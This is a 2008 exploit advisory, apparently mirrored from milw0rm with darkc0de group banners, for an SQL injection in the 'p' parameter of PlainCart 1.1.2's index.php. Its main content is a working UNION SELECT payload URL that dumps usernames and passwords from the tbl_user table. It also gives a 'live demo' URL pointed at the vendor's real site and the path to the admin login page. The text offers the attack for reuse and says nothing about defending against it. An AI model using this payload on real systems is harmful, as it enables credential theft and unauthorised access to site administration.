Plaincart 1.1.2 - 'p' SQL Injection



EKU-ID: 14385 CVE: OSVDB-52721;CVE-2008-6469;OSVDB-48436 OSVDB-ID:
Author: r45c4l Published: 2008-09-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


################################################################
#       .___             __          _______       .___        #
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    #
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   #
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   #
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   #
#        \/                  \/             \/                 #
#                   ___________   ______  _  __                #
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                #
#                 \  \___|  | \/\  ___/\     /                 #
#                  \___  >__|    \___  >\/\_/                  #
#      est.2007        \/            \/   forum.darkc0de.com   #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     #
#-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz        #
#                   and all darkc0de members                ---#
################################################################
#
# Author: r45c4l
#
# Home  : www.darkc0de.com
#
# Email : r45c4l@hotmail.com
#
# Share the c0de!
#
################################################################
#
# Title:  PlainCart (index.php) SQL Inj
#
# Script Download: http://www.phpwebcommerce.com/shopping-cart-source-code.php
#
#
###########################################################
#
# d0rk: n/a
#
###########################################################

     POC 1:-

         http://www.site.com/[script]/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user--




     Live Demo:

	http://www.phpwebcommerce.com/plaincart/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user--


    Admin panel: www.site.com/plaincart/admin/login.php

###########################################################
#
#  Bug discovered : 20 Sep.2008
###########################################################

# milw0rm.com [2008-09-20]